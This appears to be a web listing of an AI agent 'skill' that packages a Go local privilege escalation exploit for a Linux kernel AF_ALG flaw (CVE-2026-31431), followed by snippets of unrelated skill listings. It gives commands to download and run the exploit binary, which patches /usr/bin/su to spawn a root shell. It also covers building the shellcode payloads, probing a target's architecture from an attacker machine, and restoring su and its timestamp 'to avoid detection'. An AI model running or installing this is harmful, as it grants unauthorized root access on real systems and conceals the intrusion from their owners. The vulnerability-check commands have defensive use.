skills/copyfail-go-lpe/SKILL.md
Go implementation of CVE-2026-31431 (CopyFail), a Linux local privilege escalation exploit targeting the AF_ALG iov_iter kernel vulnerability affecting kernels v4.14–April 2026.
npx skillsauth add aradotso/trending-skills copyfail-go-lpeInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Skill by ara.so — Daily 2026 Skills collection.
CopyFail Go is a static Go binary implementation of CVE-2026-31431, a straight-line logic flaw in the Linux kernel's AF_ALG AEAD scatterlist handling. Unlike race-condition LPEs, it requires no timing window or kernel-specific offsets — the same binary roots every affected Linux distribution shipped since 2017.
Affected kernel range:
torvalds/linux 72548b093ee3 — August 2017, v4.14 (AF_ALG iov_iter rework)torvalds/linux a664bf3d603d — April 2026 (fix: separates source/destination scatterlists)Confirmed vulnerable at disclosure: Ubuntu, RHEL, SUSE, Amazon Linux, Debian stock cloud images.
The exploit abuses the AF_ALG AEAD in-place optimization introduced in 2017, which allowed page-cache pages to be used as a writable crypto destination via splice. This enables writing arbitrary content to read-only file-backed pages — including setuid binaries like /usr/bin/su.
CopyFail-Go patches /usr/bin/su in-place via the kernel primitive, spawns a root shell, then restores the original binary.
Download a prebuilt release from GitHub:
# x86_64
curl -L https://github.com/badsectorlabs/copyfail-go/releases/latest/download/copyfail-go_linux_amd64 -o copyfail-go
chmod +x copyfail-go
# ARM64
curl -L https://github.com/badsectorlabs/copyfail-go/releases/latest/download/copyfail-go_linux_arm64 -o copyfail-go
chmod +x copyfail-go
# ARM (32-bit)
curl -L https://github.com/badsectorlabs/copyfail-go/releases/latest/download/copyfail-go_linux_arm -o copyfail-go
chmod +x copyfail-go
# Back up su, exploit, get shell, then restore
./copyfail-go --backup /tmp/su
# Once root shell spawns:
root@host# cat /tmp/su > /usr/bin/su
root@host# touch -r /tmp/su /usr/bin/su # Restore original mtime
root@host# rm /tmp/su
# Elevate a specific binary to root without interactive shell
./copyfail-go --backup /tmp/su --exec ./your-binary
# Restore su afterward using whatever mechanism your binary provides
| Flag | Description |
|------|-------------|
| --backup <path> | Path to save the original /usr/bin/su before patching |
| --exec <path> | Execute a binary as root instead of spawning interactive shell |
Check if commit a664bf3d603d (or its distro backport) is present:
# On the target system — if this returns nothing, the kernel is likely vulnerable
grep -r "a664bf3d603d" /usr/share/doc/linux-image-$(uname -r)/changelog.gz 2>/dev/null | zcat | head
# Check kernel version date heuristic (not definitive)
uname -r
# Kernels from 2017–April 2026 without distro patch are in-window
# Debian/Ubuntu: check changelog
zcat /usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz 2>/dev/null | grep -i "algif\|AF_ALG\|a664bf3d"
# RHEL/CentOS: check RPM changelog
rpm -q --changelog kernel-$(uname -r) 2>/dev/null | grep -i "algif\|AF_ALG"
# Install Go and goreleaser
go install github.com/goreleaser/goreleaser/v2@latest
# Install payload build dependencies (Debian 13 tested)
apt install nasm python3 binutils-aarch64-linux-gnu binutils-arm-linux-gnueabihf
# From the payloads/ directory — outputs zlib-compressed hex strings
cd payloads/
./build-n-print.sh
Compare output hex strings to those embedded in main.go, or replace them with your compiled payloads.
# From project root
goreleaser build --snapshot --clean
# Outputs to dist/
# AMD64 only
GOOS=linux GOARCH=amd64 go build -o copyfail-go-amd64 .
# ARM64
GOOS=linux GOARCH=arm64 go build -o copyfail-go-arm64 .
Payloads are NASM assembly stubs, compiled per-architecture, zlib-compressed, and embedded as hex strings in main.go:
payloads/
├── build-n-print.sh # Compile all payloads and print hex
├── payload_amd64.asm # x86_64 shellcode stub
├── payload_arm64.asm # AArch64 shellcode stub
└── payload_arm.asm # ARM32 shellcode stub
The Go binary detects architecture at runtime, selects the correct payload, decompresses it, and uses the AF_ALG splice primitive to write it into /usr/bin/su's page cache.
Always restore /usr/bin/su after exploitation to avoid detection and system breakage:
#!/bin/bash
# restore-su.sh — run as root after copyfail-go
BACKUP="${1:-/tmp/su}"
if [[ ! -f "$BACKUP" ]]; then
echo "Backup not found: $BACKUP"
exit 1
fi
cat "$BACKUP" > /usr/bin/su
touch -r "$BACKUP" /usr/bin/su
rm "$BACKUP"
echo "su restored successfully"
#!/bin/bash
# Full exploit + command + restore cycle
BACKUP=$(mktemp /tmp/.su.XXXXXX)
COMMAND="${1:-id}"
./copyfail-go --backup "$BACKUP" --exec /bin/bash -c "$COMMAND"
# Restore (requires the --exec program to restore, or run restore-su.sh as root)
# On attacker machine — pick the right binary
TARGET_ARCH=$(ssh user@target uname -m)
case "$TARGET_ARCH" in
x86_64) BINARY="copyfail-go_linux_amd64" ;;
aarch64) BINARY="copyfail-go_linux_arm64" ;;
armv7l) BINARY="copyfail-go_linux_arm" ;;
*) echo "Unsupported arch: $TARGET_ARCH"; exit 1 ;;
esac
echo "Use: $BINARY"
| Symptom | Likely Cause | Fix |
|---------|-------------|-----|
| operation not permitted on AF_ALG socket | Kernel already patched (a664bf3d603d present) | Target is not vulnerable |
| Binary exits immediately, no shell | Architecture mismatch | Verify uname -m and use correct binary |
| su broken after exploit | Backup path wrong or restore not run | Run restore-su.sh with correct backup path |
| Payload build fails | Missing nasm or cross-binutils | apt install nasm binutils-aarch64-linux-gnu binutils-arm-linux-gnueabihf |
| goreleaser build fails | Go version too old | Use Go 1.21+ |
# Check AF_ALG socket support (should return 0 if supported)
python3 -c "
import socket
try:
s = socket.socket(41, socket.SOCK_SEQPACKET, 0) # AF_ALG = 38 on Linux
s.close()
print('AF_ALG available')
except Exception as e:
print(f'AF_ALG unavailable: {e}')
"
a664bf3d603d (torvalds/linux, April 2026)72548b093ee3 (torvalds/linux, August 2017)development
```markdown --- name: compose-performance-skills description: Install and use the skydoves/compose-performance-skills agent skill library to diagnose and fix Jetpack Compose performance issues including stability, recomposition, lazy layouts, modifiers, side effects, and build configuration. triggers: - "my composable recomposes too often" - "LazyColumn drops frames during scroll" - "diagnose Compose stability issues" - "fix unnecessary recomposition in Jetpack Compose" - "optimize Com
development
Headless iOS Simulator manager with host-side HID input injection, 60fps streaming, and device farm web UI for iOS 26
development
```markdown --- name: claude-code-game-studios description: Turn Claude Code into a full 49-agent game dev studio with 72 workflow skills, automated hooks, and a real studio hierarchy for Godot, Unity, and Unreal projects. triggers: - "set up claude code game studios" - "use ai agents for game development" - "set up game dev studio with claude" - "add game studio agents to my project" - "how do I use claude code for game dev" - "set up godot unity unreal ai workflow" - "49 agents g
development
```markdown --- name: xq-py-quantum-vm description: Python implementation of the Quip Network's quantum virtual machine (xqvm) triggers: - quantum virtual machine python - xqvm quip network - quantum circuit simulation python - xq-py quantum vm - quip network quantum python - simulate quantum gates python - quantum vm xqvm - xqvm-py quantum circuit --- # xq-py Quantum Virtual Machine > Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection. `xqvm-py` is a Python impl